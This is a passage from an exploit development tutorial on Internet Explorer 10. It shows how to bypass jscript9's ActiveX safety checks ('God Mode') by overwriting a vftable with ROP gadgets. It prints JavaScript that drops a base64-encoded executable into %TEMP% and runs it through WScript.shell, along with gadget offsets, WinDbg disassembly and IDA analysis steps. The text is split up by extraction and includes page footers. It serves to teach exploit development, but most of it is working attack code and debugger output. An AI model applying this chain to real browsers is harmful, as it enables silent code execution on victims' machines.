-
 
 
IE10: God Mode (2)
 
 
Fixing the God Mode
 
Before doing something radical, let’s try t
o find out where the crash is. To do this, let’s add a few alerts:
 
JavaScript
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
alert
(
"3"
);
           
// <
------------------------------------------
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
alert
(
"4"
);
           
// <
------------------------------------------
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
bStream
.
SaveToFile
(
fname
,
 
2
);
       
// 2 = overwrites file if it already exists
 
      
tStream
.
Close
()
;
 
      
bStream
.
Close
();
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window
.
atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data
.
length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data
.
charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data
.
charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr
.
push
(
String
.
fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr
.
join
(
''
)
;
 
    
}
 
    
alert
(
"1"
);
         
// <
------------------------------------------
 
    
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
alert
(
"2"
);
         
// <
------------------------------------------
 
    
fname
 
=
 
shell
.
ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcal
c.exe"
);
 
    
createExe
(
fname
,
 
decode
(
runcalc
));
 
    
shell
.
Exec
(
fname
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
      
// God mode off!
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 392 
-
 
    
alert
(
"All done!"
);
 
 
Now reload the page in IE (by going to 
127.0.0.1
), change the length of the 
Int32Array
 at 
0xc0af
000
 and see 
what happens. You should see all the three alert box from 
1
 to 
3
 and then the crash. Therefore, we can 
conclude that the crash happens when we execute the following instructions:
 
JavaScript
 
 
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
)
;
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
 
Why isn’t there any problem with 
WScript.shell
?
 
A difference should come to mind: 
ADODB.Stream
 was disabled by Microsoft! Maybe something happens in 
jscript9!ScriptSite::CreateObjectFromProgID
... Let’
s see.
 
Repeat the process and this time, when the alert box with 
3
 appears, put a breakpoint on 
jscript9!ScriptSite::CreateObjectFromProgID
. Let’s do some stepping inside 
CreateObjectFromProgID
:
 
jscript9!ScriptSite::CreateObjectFromProgID:
 
04f3becb 8bff   
         mov     edi,edi
 
04f3becd 55              push    ebp
 
04f3bece 8bec            mov     ebp,esp
 
04f3bed0 83ec34          sub     esp,34h
 
04f3bed3 a144630f05      mov     eax,dword ptr [jscript9!__security_cookie (050f6344)]
 
04f3bed8 33c5            
xor     eax,ebp
 
04f3beda 8945fc          mov     dword ptr [ebp
-
4],eax
 
04f3bedd 53              push    ebx
 
04f3bede 8b5d0c          mov     ebx,dword ptr [ebp+0Ch]
 
04f3bee1 56              push    esi
 
04f3bee2 33c0            xor     eax,eax
 
04f3bee4 57  
            push    edi
 
04f3bee5 8b7d08          mov     edi,dword ptr [ebp+8]
 
04f3bee8 8bf2            mov     esi,edx
 
04f3beea 8975dc          mov     dword ptr [ebp
-
24h],esi
 
04f3beed 8945cc          mov     dword ptr [ebp
-
34h],eax
 
04f3bef0 897dd0       
   mov     dword ptr [ebp
-
30h],edi
 
04f3bef3 8945d4          mov     dword ptr [ebp
-
2Ch],eax
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 393 
-
 
04f3bef6 8945d8          mov     dword ptr [ebp
-
28h],eax
 
04f3bef9 8945e8          mov     dword ptr [ebp
-
18h],eax
 
04f3befc 85ff            test    edi,edi
 
04f3befe 
0f85e26a1600    jne     jscript9!memset+0xf390 (050a29e6)
 
04f3bf04 8b4604          mov     eax,dword ptr [esi+4]
 
04f3bf07 e8d5000000      call    jscript9!ScriptEngine::InSafeMode (04f3bfe1)
 
04f3bf0c 85c0            test    eax,eax
 
04f3bf0e 8d45ec         
 lea     eax,[ebp
-
14h]
 
04f3bf11 50              push    eax
 
04f3bf12 51              push    ecx
 
04f3bf13 0f84d86a1600    je      jscript9!memset+0xf39b (050a29f1)
 
04f3bf19 ff1508400e05    call    dword ptr [jscript9!_imp__CLSIDFromProgID (050e4008)]
 
04f3b
f1f 85c0            test    eax,eax
 
04f3bf21 0f88e867fcff    js      jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04f0270f)
 
04f3bf27 8d45ec          lea     eax,[ebp
-
14h]
 
04f3bf2a 50              push    eax
 
04f3bf2b 8b4604          mov     eax,dword 
ptr [esi+4] ds:002b:02facc44=02f8c480
 
04f3bf2e e8e2030000      call    jscript9!ScriptEngine::CanCreateObject (04f3c315)   <
------------------
 
04f3bf33 85c0            test    eax,eax       <
------------------
 EAX = 0
 
04f3bf35 0f84d467fcff    je      jscri
pt9!ScriptSite::CreateObjectFromProgID+0xf6 (04f0270f)  <
-----
 je taken!
 
.
 
.
 
.
 
04f0270f bead010a80      mov     esi,800A01ADh
 
04f02714 e99d980300      jmp     jscript9!ScriptSite::CreateObjectFromProgID+0xe3 (04f3bfb6)
 
.
 
.
 
.
 
04f3bfb6 8b4dfc          mov   
  ecx,dword ptr [ebp
-
4] ss:002b:03feb55c=91c70f95
 
04f3bfb9 5f              pop     edi
 
04f3bfba 8bc6            mov     eax,esi
 
04f3bfbc 5e              pop     esi
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 394 
-
 
04f3bfbd 33cd            xor     ecx,ebp
 
04f3bfbf 5b              pop     ebx
 
04f3bfc0 e879
53f2ff      call    jscript9!__security_check_cookie (04e6133e)
 
04f3bfc5 c9              leave
 
04f3bfc6 c20800          ret     8
 
As we can see, 
CanCreateObject
 returns 
0
 and our familiar 
CanObjectRun
 is not even called. What 
happens if we force 
CanCreateO
bject 
to return 
true
 (
EAX = 1
)? Try to repeat the whole process, but this 
time, right after the call to 
CanCreateObject
, set 
EAX
 to 
1
 (use 
r eax=1
). Remember that you need to do that 
twice because we create two 
ADODB.Stream
 objects.
 
Now the alert box with 
4
 appears but we have a crash after we close it. Why don’t we try to keep the 
God 
Mode
 enabled only when strictly necessary? Let’s change the code as follows:
 
JavaScript
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
 
// content of exe file encoded in bas
e64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AA <snipped> AAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bSt
ream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God mode off!
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStr
eam
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
      
bStream
.
SaveToFile
(
fname
,
 
2
);
       
// 2 = overwrites file if it already exists
 
      
tStream
.
Close
();
 
  
bStream
.
Close
();
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window
.
atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
    
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data
.
length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data
.
charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data
.
charCodeAt
(
i
*
2
 
+
 
1
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 395 
-
 
        
arr
.
push
(
String
.
fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr
.
join
(
''
);
 
  
}
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
    
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God mode off!
 
    
fname
 
=
 
shell
.
ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc
.exe"
);
 
    
createExe
(
fname
,
 
decode
(
runcalc
));
 
    
shell
.
Exec
(
fname
);
 
 
alert
(
"All done!"
);
 
 
Let’s try again to load the page and set 
EAX
 to 
1
 right after 
CanCreateObject
. This time, let’s put the 
breakpoint directly on 
CanCreateObject
:
 
bp jscript9!Scr
iptEngine::CanCreateObject
 
When the breakpoint is triggered, hit 
Shift+F11
 and then set 
EAX
 to 
1
 (the first time it’s already 
1
). OK, now 
there is no crash but the calculator doesn’t appear. If you repeat the process with the 
Developer Tools
 
enabled, you s
hould see the following error:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 396 
-
 
 
Let’s leave that error for later. For now we should be happy that we (almost) solved the problem wi
th the 
God Mode
. We still need to modify the behavior of 
CanCreateObject
 somehow so that it always returns true. 
Again, repeat the whole process and put a breakpoint on 
CanCreateObject
. When the breakpoint is 
triggered, we can begin to examine 
CanCreateObj
ect
:
 
jscript9!ScriptEngine::CanCreateObject:
 
04dcc315 8bff            mov     edi,edi
 
04dcc317 55              push    ebp
 
04dcc318 8bec            mov     ebp,esp
 
04dcc31a 51              push    ecx
 
04dcc31b 51              push    ecx
 
04dcc31c 57       
       push    edi
 
04dcc31d 8bf8            mov     edi,eax
 
04dcc31f f687e401000008  test    byte ptr [edi+1E4h],8
 
04dcc326 743d            je      jscript9!ScriptEngine::CanCreateObject+0x50 (04dcc365)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 397 
-
 
04dcc328 8d45fc          lea     eax,[ebp
-
4]
 
04dcc32b
 50              push    eax
 
04dcc32c e842000000      call    jscript9!ScriptEngine::GetSiteHostSecurityManagerNoRef (04dcc373)
 
04dcc331 85c0            test    eax,eax
 
04dcc333 7835            js      jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a)
 [br=0]
 
04dcc335 8b45fc          mov     eax,dword ptr [ebp
-
4]
 
04dcc338 8b08            mov     ecx,dword ptr [eax]        <
------------------
 ecx = object.vftptr
 
04dcc33a 6a00            push    0
 
04dcc33c 6a00            push    0
 
04dcc33e 6a10          
  push    10h
 
04dcc340 ff7508          push    dword ptr [ebp+8]
 
04dcc343 8d55f8          lea     edx,[ebp
-
8]
 
04dcc346 6a04            push    4
 
04dcc348 52              push    edx                                            +
---------------------
 
04dcc349
 6800120000      push    1200h                                          |
 
04dcc34e 50              push    eax                                            v
 
04dcc34f ff5110          call    dword ptr [ecx+10h]  ds:002b:6ac755f0={MSHTML!TearoffThunk4 (6a2560
4a)}
 
04dcc352 85c0            test    eax,eax
 
04dcc354 7814            js      jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a)
 
04dcc356 f645f80f        test    byte ptr [ebp
-
8],0Fh
 
04dcc35a 6a00            push    0
 
04dcc35c 58              pop     
eax
 
04dcc35d 0f94c0          sete    al
 
04dcc360 5f              pop     edi
 
04dcc361 c9              leave
 
04dcc362 c20400          ret     4
 
Look at the virtual call at 
04dcc34f
: we can use the same trick we used with 
CanObjectRun
! As before, 
ECX
 
points 
to a vftable:
 
0:007> dds ecx
 
6ac755e0  6a0b2681 MSHTML!PlainQueryInterface
 
6ac755e4  6a0b25a1 MSHTML!CAPProcessor::AddRef
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 398 
-
 
6ac755e8  6a08609d MSHTML!PlainRelease
 
6ac755ec  6a078eb5 MSHTML!TearoffThunk3
 
6ac755f0  6a25604a MSHTML!TearoffThunk4           <
----
-------
 we need to modify this for CanCreateObject
 
6ac755f4  04dcc164 jscript9!ScriptEngine::CanObjectRun+0xaf   <
----------
 this is our fix for CanObjectRun!
 
6ac755f8  6a129a77 MSHTML!TearoffThunk6
 
6ac755fc  6a201a73 MSHTML!TearoffThunk7
 
6ac75600  6a12770
c MSHTML!TearoffThunk8
 
6ac75604  6a12b22c MSHTML!TearoffThunk9
 
6ac75608  6a12b1e3 MSHTML!TearoffThunk10
 
6ac7560c  6a257db5 MSHTML!TearoffThunk11
 
6ac75610  6a12b2b8 MSHTML!TearoffThunk12
 
6ac75614  6a332a3d MSHTML!TearoffThunk13
 
6ac75618  6a242719 MSHTML!Tea
roffThunk14
 
6ac7561c  6a254879 MSHTML!TearoffThunk15
 
6ac75620  6a12b637 MSHTML!TearoffThunk16
 
6ac75624  6a131bf3 MSHTML!TearoffThunk17
 
6ac75628  6a129649 MSHTML!TearoffThunk18
 
6ac7562c  6a4a8422 MSHTML!TearoffThunk19
 
6ac75630  6a58bc4a MSHTML!TearoffThunk2
0
 
6ac75634  6a1316d9 MSHTML!TearoffThunk21
 
6ac75638  6a2e7b23 MSHTML!TearoffThunk22
 
6ac7563c  6a212734 MSHTML!TearoffThunk23
 
6ac75640  6a2e75ed MSHTML!TearoffThunk24
 
6ac75644  6a4c28c5 MSHTML!TearoffThunk25
 
6ac75648  6a3c5a7d MSHTML!TearoffThunk26
 
6ac7564c
  6a3a6310 MSHTML!TearoffThunk27
 
6ac75650  6a3bff2d MSHTML!TearoffThunk28
 
6ac75654  6a3aa803 MSHTML!TearoffThunk29
 
6ac75658  6a3cd81a MSHTML!TearoffThunk30
 
6ac7565c  6a223f19 MSHTML!TearoffThunk31
 
As you can see, that’s the same vftable we modified for 
Can
ObjectRun
. Now we need to modify 
[ecx+10h]
 
for 
CanCreateObject
. We might try to overwrite 
[ecx+10h]
 with the address of the 
epilog
 of 
CanCreateObject
, 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 399 
-
 
but it won’t work. The problem is that we need to zero out 
EDI
 before returning from 
CanCreateObject
. 
Her
e’s the code right after the call to 
CanCreateObject
:
 
04ebbf2e e8e2030000      call    jscript9!ScriptEngine::CanCreateObject (04ebc315)
 
04ebbf33 85c0            test    eax,eax
 
04ebbf35 0f84d467fcff    je      jscript9!ScriptSite::CreateObjectFromProgID+0
xf6 (04e8270f)
 
04ebbf3b 6a05            push    5
 
04ebbf3d 58              pop     eax
 
04ebbf3e 85ff            test    edi,edi
 
04ebbf40 0f85b66a1600    jne     jscript9!memset+0xf3a6 (050229fc)      <
-----------------
 taken if EDI != 0
 
If the 
jne
 is taken
, 
CreateObjectFromProgID
 and 
CreateActiveXObject
 will fail.
 
I looked for hours but I couldn’t find any suitable code to call. Something like
 
Assembly (x86)
 
 
xor
   
edi
,
 
edi
 
leave
 
ret
   
4
 
 
would be perfect, but it just doesn’t exist. I looked for any variati
ons I could think of, but to no avail. I also 
looked for
 
Assembly (x86)
 
 
mov
   
dword
 
ptr
 
[
edx
],
 
0
 
ret
   
20h
 
 
and variations. This code would mimic a 
call
 to the original virtual function and clear
 [ebp
-
8]
. This way, 
CanCreateObject
 would return true:
 
04dcc
338 8b08            mov     ecx,dword ptr [eax]
 
04dcc33a 6a00            push    0
 
04dcc33c 6a00            push    0
 
04dcc33e 6a10            push    10h
 
04dcc340 ff7508          push    dword ptr [ebp+8]
 
04dcc343 8d55f8          lea     edx,[ebp
-
8]      
<
----------
 edx = ebp
-
8
 
04dcc346 6a04            push    4
 
04dcc348 52              push    edx
 
04dcc349 6800120000      push    1200h
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 400 
-
 
04dcc34e 50              push    eax
 
04dcc34f ff5110          call    dword ptr [ecx+10h]  ds:002b:6ac755f0={MSHTML!Tearo
ffThunk4 (6a25604a)}
 
04dcc352 85c0            test    eax,eax
 
04dcc354 7814            js      jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a)
 
04dcc356 f645f80f        test    byte ptr [ebp
-
8],0Fh      <
--------
 if [ebp
-
8] == 0, then ...
 
04dcc35a 6a
00            push    0
 
04dcc35c 58              pop     eax
 
04dcc35d 0f94c0          sete    al                 <
--------
 ... then EAX = 1
 
04dcc360 5f              pop     edi                <
--------
 restores EDI (it was 0)
 
04dcc361 c9              leave
 
04dcc362 c20400          ret     4
 
Note that this would also clear 
EDI
, because 
EDI
 was 
0
 when 
CanCreateObject
 was called.
 
Next, I tried to do some 
ROP
. I looked for something like this:
 
Assembly (x86)
 
 
xchg
  
ecx
,
 
esp
 
ret
 
 
Unfortunately, I couldn’t find a
nything similar. If only we could control some other register beside 
ECX
...
 
Well, it turns out that we can control 
EAX
 and 
xchg eax, esp
 
gadgets
 are certainly more common than 
xchg 
ecx, esp
 gadgets.
 
Here’s the schema we’re going to use:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 401 
-
 
 
We already know that 
CanCreateObject
 and 
CanObjectRun
 call virtual functions from the same VFTable. 
You can easily verify that not only do they call vi
rtual functions from the same VFTable, but they call them on 
the same object. This is also shown in the scheme above.
 
Let’s look again at the relevant code in 
CanCreateObject
:
 
04dcc338 8b08            mov     ecx,dword ptr [eax]  <
-----------
 we control EA
X, which points to "object"
 
04dcc33a 6a00            push    0            <
-----------
 now, ECX = object."vftable ptr"
 
04dcc33c 6a00            push    0
 
04dcc33e 6a10            push    10h
 
04dcc340 ff7508          push    dword ptr [ebp+8]
 
04dcc343 8d55f
8          lea     edx,[ebp
-
8]
 
04dcc346 6a04            push    4
 
04dcc348 52              push    edx
 
04dcc349 6800120000      push    1200h
 
04dcc34e 50              push    eax
 
04dcc34f ff5110          call    dword ptr [ecx+10h]  <
-----------
 call to ga
dget 1 (in the picture)
 
04dcc352 85c0            test    eax,eax
 
04dcc354 7814            js      jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a)
 
04dcc356 f645f80f        test    byte ptr [ebp
-
8],0Fh
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 402 
-
 
04dcc35a 6a00            push    0
 
04dcc35c 58   
           pop     eax
 
04dcc35d 0f94c0          sete    al
 
04dcc360 5f              pop     edi
 
04dcc361 c9              leave        <
-----------
 this is gadget 4
 
04dcc362 c20400          ret     4
 
The first gadget, when called, make 
ESP
 point to 
object+4
 and returns to gadget 
2
. After gadget 
2
 and 
3
, 
EDI
 is 
0
 and 
EAX
 non
-
zero. Gadget 
4
 restores 
ESP
 and returns from 
CanCreateObject
.
 
Here’s the javascript code to set up object and vftable like in the picture above:
 
JavaScript
 
 
//                        
                          vftable
 
    
//                                    +
-----
> +
------------------
+
 
    
//                                    |       |                  |
 
    
//                                    |       |                  |
 
    
//   
                                 |  0x10:| jscript9+0x10705e| 
--
> "XCHG EAX,ESP | ADD EAX,71F84DC0 |
 
    
//                                    |       |                  |      MOV EAX,ESI | POP ESI | RETN"
 
    
//                                    |  0x14
:| jscript9+0xdc164 | 
--
> "LEAVE | RET 4"
 
    
//                                    |       +
------------------
+
 
    
//                 object             |
 
    
// EAX 
---
> +
-------------------
+     |
 
    
//          | vftptr            |
-----
+
 
    
//     
     | jscript9+0x15f800 | 
--
> "XOR EAX,EAX | RETN"
 
    
//          | jscript9+0xf3baf  | 
--
> "XCHG EAX,EDI | RETN"
 
    
//          | jscript9+0xdc361  | 
--
> "LEAVE | RET 4"
 
    
//          +
-------------------
+
 
 
// If we do "write(pp_obj, X)", we'll 
have EAX = X in CanCreateObject
 
    
var
 
pp_obj
 
=
 
...
 
ptr
 
to
 
ptr
 
to
 
object
 
...
 
    
var
 
old_objptr
 
=
 
read
(
pp_obj
);
 
    
var
 
old_vftptr
 
=
 
read
(
old_objptr
);
 
    
// Create the new vftable.
 
    
var
 
new_vftable
 
=
 
new
 
Int32Array
(
0x708
/
4
);
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
new_vftable
.
length
;
 
++
i
)
 
      
new_vftable
[
i
]
 
=
 
read
(
old_vftptr
 
+
 
i
*
4
);
 
    
new_vftable
[
0x10
/
4
]
 
=
 
jscript9
+
0x10705e
;
 
    
new_vftable
[
0x14
/
4
]
 
=
 
jscript9
+
0xdc164
;
 
    
var
 
new_vftptr
 
=
 
read
(
get_addr
(
new_vftable
)
 
+
 
0x1c
);
        
// ptr to raw buffer of
 new_vftable
 
    
// Create the new object.
 
    
var
 
new_object
 
=
 
new
 
Int32Array
(
4
);
 
    
new_object
[
0
]
 
=
 
new_vftptr
;
 
    
new_object
[
1
]
 
=
 
jscript9
 
+
 
0x15f800
;
 
    
new_object
[
2
]
 
=
 
jscript9
 
+
 
0xf3baf
;
 
    
new_object
[
3
]
 
=
 
jscript9
 
+
 
0xdc361
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 403 
-
 
    
var
 
new_obj
ptr
 
=
 
read
(
get_addr
(
new_object
)
 
+
 
0x1c
);
         
// ptr to raw buffer of new_object
 
    
function
 
GodModeOn
()
 
{
 
      
write
(
pp_obj
,
 
new_objptr
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
pp_obj
,
 
old_objptr
);
 
    
}
 
 
The code should be easy to u
nderstand. We create 
object
 (
new_object
) and 
vftable
 (
new_vftable
) by using 
two 
Int32Arrays
 (in particular, their raw buffers) and make 
object
 point to 
vftable
. Note that our vftable is a 
modified copy of the old vftable. Maybe there’s no need to make a co
py of the old vftable because only the 
two modified fields (at offsets 
0x10
 and 
0x14
) are used, but that doesn’t hurt.
 
We can now enable the 
God Mode
 by making 
EAX
 point to our object and disable the 
God Mode
 by making 
EAX
 point to the original object.
 
Con
trolling EAX
 
To see if we can control 
EAX
, we need to find out where the value of 
EAX
 comes from. I claimed that 
EAX
 
can be controlled and showed how we can exploit this to do some ROP. Now it’s time for me to show you 
exactly how 
EAX
 can be controlled. In
 reality, this should be the first thing you do. First you determine if you 
can control something and only then write code for it.
 
It’s certainly possible to do the kind of analysis required for this task in WinDbg, but 
IDA Pro
 is way better for 
this. If y
ou don’t own a copy of IDA Pro, download the free version (
link
).
 
IDA is a very smart disassembler. Its main feature is that it’s 
interactive
, that is, once IDA has finis
hed 
disassembling the code, you can edit and manipulate the result. For instance, you can correct mistakes 
made by IDA, add 
comments
, define 
structures
, change 
names
, etc...
 
If you want a career in 
Malware Analysis
 or 
Exploit Development
, you should get real
ly comfortable with IDA 
and buy the Pro version.
 
CanCreateObject
 is in 
jscript9
. Let’s find out the path of this module in WinDbg:
 
0:015> lmf m jscript9
 
start    end        module name
 
71c00000 71ec6000   jscript9 C:
\
Windows
\
SysWOW64
\
jscript9.dll
 
Open 
jscr
ipt9.dll
 in IDA and, if needed, specify the path for the database created by IDA. When asked, allow 
IDA to download 
symbols
 for 
jscript9.dll
. Press 
CTRL+P
 (
Jump to function
), click on 
Search
 and enter 
CanCreateObject
. Now 
CanCreateObject
 should be selected
 like shown in the following picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 404 
-
 
 
After you double click on 
CanCreateObject
 you should see the graph of the function 
CanCreate
Object
. If you 
see linear code, hit the spacebar. To rename a symbol, click on it and press 
n
. IDA has a very useful 
feature: when some text is selected, all occurrences of that text are highlighted. This is useful to track things 
down.
 
Have a look at the 
following picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 405 
-
 
 
It’s quite clear that 
[ebp+object]
 (note that I renamed 
var_4
 to 
object
) is modified 
inside 
?GetSiteHostSecurit
yManagerNoRef
. Let’s have a look at that function:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 406 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 407 
-
 
 
As we can see, our variable 
object
 is overwritten with 
[edi+1F0h]
. We also see that if 
[edi+1F0h]
 is 
0
, it’s 
initialized. We need to keep this fact in mind for later. Now that we know that we need to t
rack 
edi
, let’s look 
again at 
CanCreateObject
:
 
 
To see what code calls 
CanCreateObject
, click somewhere where indicated in the pict
ure above and press 
CTRL+X
. Then select the only function shown. We’re now in 
CreateObjectFromProgID
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 408 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 409 
-
 
 
Thi
s is what we’ve learned so far:
 
esi = edx
 
eax = [esi+4]
 
edi = eax
 
object = [edi+1f0h]
 
Now we need to go to the caller of 
CreateObjectFromProgID
 and
 follow 
EDX
. To do that, click somewhere 
on the signature of 
CreateObjectFromProgID
 and press 
CTRL+X
. You should see two options: of course, 
select 
CreateActiveXObject
. Now we’re inside 
CreateActiveXObject
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 410 
-
 
Let’s update our little schema:
 
esi = arg0
 
edx = esi
 
esi = edx
 
eax = [esi+4]
 
edi = eax
 
object = [edi+1f0h]
 
Now we need to follow the first argument passed to 
CreateActiveXObject
. 
As before, let’s go to the code 
which calls 
CreateActiveXObject
. Look at the following picture (note that I grouped some nodes together to 
make the graph more compact):
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 411 
-
 
After this, the complete schema is the following:
 
eax = arg_0
 
eax = [eax+28h]
 
edx = eax
 
esi = edx
 
eax = [esi+4]
 
edi = eax
 
object = [edi+1f0h]
 
Now we must follow the first argument passed to 
JavascriptActiveXObject::Ne
wInstance
. When we click on 
its signature and press 
CTRL+X
 we’re shown references which doesn’t look familiar. It’s time to go back in 
WinDbg.
 
Open in IE a page with this code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
  
shell.Exec
(
'calc.exe'
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Put a breakpoint on 
CanCreateObject
:
 
bp jscript9!ScriptEngine::CanCreateObject
 
When the breakpoint is triggered, let’s step out of the current function
 by pressing 
Shift+F11
, until we are in 
jscript9!Js::InterpreterStackFrame::NewScObject_Helper
. You’ll see the following:
 
045725c4 890c82          mov     dword ptr [edx+eax*4],ecx
 
045725c7 40              inc     eax
 
045725c8 3bc6            cmp     eax,e
si
 
045725ca 72f5            jb      jscript9!Js::InterpreterStackFrame::NewScObject_Helper+0xc2 (045725c1)
 
045725cc ff75ec          push    dword ptr [ebp
-
14h]
 
045725cf ff75e8          push    dword ptr [ebp
-
18h]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 412 
-
 
045725d2 ff55e4          call    dword ptr 
[ebp
-
1Ch]
 
045725d5 8b65e0          mov     esp,dword ptr [ebp
-
20h] ss:002b:03a1bc00=03a1bbe4   <
---------
 we're here!
 
045725d8 8945d8          mov     dword ptr [ebp
-
28h],eax
 
045725db 8b4304          mov     eax,dword ptr [ebx+4]
 
045725de 83380d          c
mp     dword ptr [eax],0Dh
 
We can see why IDA wasn’t able to track this call: it’s a 
dynamic call
, meaning that the destination of the call 
is not static. Let’s examine the first argument:
 
0:007> dd poi(ebp
-
18)
 
032e1150  045e2b70 03359ac0 03355520 00000003
 
032e1160  00000000 ffffffff 047c4de4 047c5100
 
032e1170  00000037 00000000 02cc4538 00000000
 
032e1180  0453babc 00000000 00000001 00000000
 
032e1190  00000000 032f5410 00000004 00000000
 
032e11a0  00000000 00000000 00000000 00000000
 
032e11b0  04533600 033598
c0 033554e0 00000003
 
032e11c0  00000000 ffffffff 047c4de4 047c5660
 
The first value might be a pointer to a vftable. Let’s see:
 
0:007> ln 045e2b70
 
(045e2b70)   jscript9!JavascriptActiveXFunction::`vftable'   |  (04534218)   jscript9!Js::JavascriptSafeArrayO
bject::`vftable'
 
Exact matches:
 
    jscript9!JavascriptActiveXFunction::`vftable' = <no type information>
 
And indeed, we’re right! More important, 
JavascriptActiveXFunction
 is the function 
ActiveXObject
 we use to 
create 
ActiveX
 objects! That’s our starting
